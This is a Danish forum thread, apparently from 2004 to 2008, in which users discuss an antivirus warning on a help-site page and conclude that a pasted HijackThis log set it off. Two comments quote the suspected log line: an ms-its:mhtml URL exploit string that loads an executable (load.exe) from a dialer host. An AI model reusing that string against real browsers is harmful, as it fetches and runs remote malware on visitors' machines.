Avatar billede besoft Nybegynder
03. juli 2004 - 12:11 Der er 11 kommentarer og
1 løsning

Bloodhound.Exploit.6 på en EKSP side

Hejsa

Blev lidt overrasket da min Norton poppede op med en notification på en eksperten side (http://www.eksperten.dk/spm/499272).

Siden er tilsyneladende inficeret med Bloodhound.Exploit.6 virus. Testede på 3 maskiner og de kom allesammen med samme warning.
Avatar billede dmcn Praktikant
03. juli 2004 - 12:13 #1
Hijackthis-logs forårsager ofte den type virusalarmer. Norton kontrollerer konstant de dokumenter du henter, og hvis en af dem indeholder en streng, som den kan genkende fra en virus, får du advarslen. Det er præcis hvad der sker her - spørgsmålet er ikke inficeret, men det indeholder tekst der gør, at Norton tror der er en virus på spil.
Avatar billede besoft Nybegynder
03. juli 2004 - 12:15 #2
OK, - egentlig underligt for jeg har da kigget på en del sider omkring HijackThis og masser af logfiler, men kun den ene side giver en warning.
Men hvis det ikke er et problem, glemmer jeg det bare igen.
Avatar billede arlet Juniormester
03. juli 2004 - 15:27 #3
besoft -> Det sker en gang imellem, som n0rmality siger, men tag det ganske roligt...

Det er kun norton, der har dette lille problem, så det glemmer du bare*S*
Avatar billede besoft Nybegynder
03. juli 2004 - 17:04 #4
ok
Avatar billede johnstigers Seniormester
03. juli 2004 - 20:16 #5
besoft> jeg har været ude for at Norton Firewall detektede en hacker hvis jeg gik ind på en bestemt exp side :)
Avatar billede johnstigers Seniormester
03. juli 2004 - 20:17 #6
Og dermed blokerede for eksperten :)
Avatar billede besoft Nybegynder
03. juli 2004 - 20:24 #7
Der er lidt underligt at Norton er så følsom. Jeg har ikke nogen firewall på min lokale PC, da den ligger på min Linux gateway som alle mine medarbejdere benytter, så det er kun Norton Antivirus der detekterer en bestemt streng på en exp side og dermed brokker sig.

Skidt nu være med det... jeg kunne sagtens se siden... den smed bare noget i karantæne.
Avatar billede thesurfer Nybegynder
07. november 2005 - 13:33 #8
Lidt sent at tilføje noget, men spm'et jo ikke lukket endnu :-)

Det er ikke kun Norton der popper up. Det skulle gerne være (næsten) samtlige antivirus scannere, da der er tegn på Bloodhound.

By the way.. jeg mener at det er denne linie, der er skyld i det:

O16 - DPF: {10000000-1000-0000-1000-000000000000} - ms-its:mhtml:file://C:\MAIN.MHT!

http://d.dialer2004.com//saf/main.chm::/load.exe

:-)

/theSurfer
Avatar billede thesurfer Nybegynder
07. november 2005 - 13:33 #9
OK, det var det så ikke.. med mindre at det er fordi den er delt..?

O16 - DPF: {10000000-1000-0000-1000-000000000000} - ms-its:mhtml:file://C:\MAIN.MHT!http://d.dialer2004.com//saf/main.chm::/load.exe

/theSurfer
Avatar billede besoft Nybegynder
14. november 2008 - 12:26 #10
Tror bare jeg lukker denne her...
Avatar billede besoft Nybegynder
14. november 2008 - 12:26 #11
Luk tak
Avatar billede johnstigers Seniormester
14. november 2008 - 13:35 #12
Det skulle du nok have gjort for 3 år siden ;)